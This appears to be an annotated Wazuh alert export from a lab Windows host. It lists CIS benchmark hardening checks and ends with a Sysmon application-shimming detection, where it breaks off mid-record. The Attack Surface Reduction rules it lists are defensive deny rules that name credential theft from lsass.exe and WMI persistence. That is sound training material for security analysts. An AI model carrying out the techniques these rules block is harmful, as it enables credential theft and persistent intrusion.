data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26321 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Attack Surface Reduction rules: Set the state for each ASR rule' is configured. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting sets the Attack Surface Reduction rules. The recommended state for this setting is: 26190899-1602-49e8-8b27-eb1d0a1ce869 - 1 (Block Office communication application from creating child processes) 3b576869-a4ec-4529-8536-b80a7769e899 - 1 (Block Office applications from creating executable content) 5beb7efe-fd9a-4556-801d-275e5ffc04cc - 1 (Block execution of potentially obfuscated scripts) 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 - 1 (Block Office applications from injecting code into other processes) 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c - 1 (Block Adobe Reader from creating child processes) 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b - 1 (Block Win32 API calls from Office macro) 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 - 1 (Block credential stealing from the Windows local security authority subsystem (lsass.exe)) b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 - 1 (Block untrusted and unsigned processes that run from USB) be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 - 1 (Block executable content from email client and webmail) d3e037e1-3eb8-44c8-a917-57927947596d - 1 (Block JavaScript or VBScript from launching downloaded executable content) d4f940ab-401b-4efc-aadc-ad5f3c50688a - 1 (Block Office applications from creating child processes) e6db77e5-3df2-4cf1-b95a-636979351e5b - 1 (Block persistence through WMI event subscription) Note: More information on ASR rules can be found at the following link: Use Attack surface reduction rules to prevent malware infection | Microsoft Docs Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Attack surface reduction helps prevent actions and apps that are typically used by exploit-seeking malware to infect machines. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path so that 26190899-1602-49e8-8b27-eb1d0a1ce869, 3b576869-a4ec-4529-8536-b80a7769e899, 5beb7efe-fd9a-4556-801d-275e5ffc04cc, 75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84, 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c, 92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b, 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2, b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4, be9ba2d9-53ea-4cdc-84e5-9b1eeee46550, d3e037e1-3eb8-44c8-a917-57927947596d, d4f940ab-401b-4efc-aadc-ad5f3c50688a, and e6db77e5-3df2-4cf1-b95a-636979351e5b are each set to a value of 1: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Microsoft Defender Exploit Guard\Attack Surface Reduction\Configure Attack Surface Reduction rules: Set the state for each ASR rule. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 1709 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.5.1.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\ASR\\Rules'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn off real-time protection' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 10 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.2'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2629197 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26325 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn off real-time protection' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting configures real-time protection prompts for known malware detection. Microsoft Defender Antivirus alerts you when malware or potentially unwanted software attempts to install itself or to run on your computer. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn off real-time protection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 11 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.3'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.7'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2632663 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26326 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn on behavior monitoring' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure behavior monitoring for Microsoft Defender Antivirus. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on behavior monitoring. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19008 Numeric ID of the detection rule that fired.
rule.firedtimes: 12 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.9.4'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.7'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2635900 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26327 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Turn on script scanning' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows script scanning to be turned on/off. Script scanning intercepts scripts then scans them before they are executed on the system. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on script scanning. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.9.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: passed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 31 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.5'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.11.1'] Maps to CIS benchmark controls – governance folks love this.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2639213 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26328 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Configure Watson events' is set to 'Disabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to configure whether or not Watson events are sent. The recommended state for this setting is: Disabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Watson events are the reports that get sent to Microsoft when a program or service crashes or fails, including the possibility of automatic submission. Preventing this information from being sent can help reduce privacy concerns. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Reporting\Configure Watson events. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.11.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC6.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 32 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '2.2.3'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'CM.1'] NIST 800‑53 mapping – US Fed controls.
rule.cis: ['18.9.47.12.1'] Maps to CIS benchmark controls – governance folks love this.
rule.cis_csc: ['10.4'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gpg_13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr_IV: ['35.7.d'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.hipaa: ['164.312.b'] HIPAA mapping – healthcare data exposure.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2642421 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26329 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Scan removable drives' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting allows you to manage whether or not to scan for malicious software and unwanted software in the contents of removable drives, such as USB flash drives, when running a full scan. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: It is important to ensure that any present removable drives are always included in any type of scan, as removable drives are more likely to contain malicious software brought in to the enterprise managed environment from an external, unmanaged computer. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Scan\Scan removable drives. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer). Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.47.12.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.cis_csc: 10.4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.pci_dss: 2.2.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.nist_800_53: CM.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gpg_13: 4.3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.gdpr_IV: 35.7.d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.hipaa: 164.312.b No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.compliance.tsc: CC5.2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Scan'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.sca.check.result: failed PASS or FAIL. Red = needs fixing.
location: sca Which log source produced the event (e.g., sysmon, auditd).
- 4. Document findings and escalate to Team Lead if needed.
CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
rule.description: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 19007 Numeric ID of the detection rule that fired.
rule.firedtimes: 33 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sca'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
rule.pci_dss: ['2.2', '4.1'] PCI DSS mapping – card‑holder data rules.
rule.nist_800_53: ['CM.1', 'SC.8'] NIST 800‑53 mapping – US Fed controls.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535010.2646145 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: sca Name of the Wazuh decoder that parsed this raw log.
data.sca.type: check Scan engine type (script, registry, pkg). Good to know when writing fixes.
data.sca.scan_id: 1948494698 Session ID grouping all checks from the same run.
data.sca.policy: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0 Name of the benchmark policy (e.g., CIS Ubuntu 20.04).
data.sca.check.id: 26340 Unique ID for this single check – copy to search historic runs.
data.sca.check.title: Ensure 'Do not allow drive redirection' is set to 'Enabled'. Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).
data.sca.check.description: This policy setting prevents users from sharing the local drives on their client computers to Remote Desktop Servers that they access. Mapped drives appear in the session folder tree in Windows Explorer in the following format: \\TSClient\$ If local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. The recommended state for this setting is: Enabled. Detailed what/why of the check – great learning resource.
data.sca.check.rationale: Data could be forwarded from the user's Remote Desktop Services session to the user's local computer without any direct user interaction. Malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the Remote Desktop session. Why this matters (compliance / security impact).
data.sca.check.remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Device and Resource Redirection\Do not allow drive redirection. Note: This Group Policy path is provided by the Group Policy template TerminalServer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates. Vendor‑recommended fix text – copy‑paste for hardening tickets.
data.sca.check.compliance.cis: 18.9.65.3.3.3 Section number of this recommendation inside the named CIS benchmark. Use it to find the full control text, audit procedure and impact notes in the benchmark PDF.
data.sca.check.compliance.pci_dss: 4.1 PCI DSS requirement the check is mapped to (4.1: protect cardholder data in transit with strong cryptography). A starting point for audit evidence, not proof of compliance on its own.
data.sca.check.compliance.hipaa: 164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II HIPAA Security Rule citations (45 CFR 164.312 technical safeguards: access control and transmission security).
data.sca.check.compliance.nist_800_53: SC.8 NIST SP 800-53 control family and number (SC-8, Transmission Confidentiality and Integrity).
data.sca.check.compliance.tsc: CC6.1,CC6.7,CC7.2 AICPA Trust Services Criteria (SOC 2) the check supports: logical access (CC6.1), restricting data movement and transmission (CC6.7), anomaly monitoring (CC7.2).
data.sca.check.registry: ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services'] Registry key(s) the check reads to decide pass/fail. The Group Policy named in the remediation writes fDisableCdm (REG_DWORD, 1 = enabled) under this key; Policies\ keys only exist once a GPO or local policy has set them, so a missing key also fails.
data.sca.check.result: failed passed, failed or not applicable. failed = the host is out of policy: apply the remediation above and confirm on the next scan.
location: sca Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 15 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535011.2650331 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP ETW provider that wrote the event. Event IDs are only unique per provider, so always read this together with eventID (SPP = Software Protection Platform, Windows licensing).
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} GUID of that provider. Stable across renames and language packs, so it is the safer key for filters and rules.
data.win.system.eventSourceName: Software Protection Platform Service Legacy event-log source name, present only when a classic (non-manifest) provider wrote the record.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 Version of the event's XML template. Field names and order can change between versions, so decoders key on it.
data.win.system.level: 4 Severity level: 1 Critical, 2 Error, 3 Warning, 4 Informational, 5 Verbose (0 = LogAlways, which Security audit events carry).
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Keyword bitmask. 0x0080000000000000 is the Classic bit that every legacy Application/System event carries; nothing event-specific to filter on here.
data.win.system.systemTime: 2025-04-24T22:50:00.8040331Z Time Windows wrote the event, in UTC (Z). Order timelines by this rather than by the alert id, which reflects when the manager received it.
data.win.system.eventRecordID: 2429 Incremental log record number – handy for timeline order.
data.win.system.processID: 11200 PID of the process that logged the event (the provider), not necessarily the process the event is about.
data.win.system.threadID: 0 Thread inside that logging process. 0 is normal for classic providers; only deep forensics cares.
data.win.system.channel: Application Event log channel the record came from (Application, System, Security, Microsoft-Windows-Sysmon/Operational).
data.win.system.computer: Attacker Computer name Windows stamped on the record. Should equal agent.name; a mismatch means forwarded logs or a renamed host.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-25T22:49:00Z. Reason: RulesEngine." Rendered message. The licensing service rescheduling its own restart a day out is routine housekeeping: informational, not a detection.
data.win.eventdata.data: 2025-04-25T22:49:00Z, RulesEngine Raw event parameters before message rendering (the scheduled time and the reason string).
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Application Compatibility Database launched Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92058 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1546.011'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Privilege Escalation', 'Persistence'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Application Shimming'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745535028.2651913 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Event IDs are only unique per provider: Sysmon 1 is process creation, not the Security log's 4688.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} GUID of the Sysmon provider. Stable across renames and language packs, so it is the safer key for filters and rules.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 Version of the event's XML template (the Sysmon event 1 schema). Field names and order can change between versions.
data.win.system.level: 4 Severity level: 4 = Informational. Sysmon logs everything at this level; the risk is in the fields, not the level.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
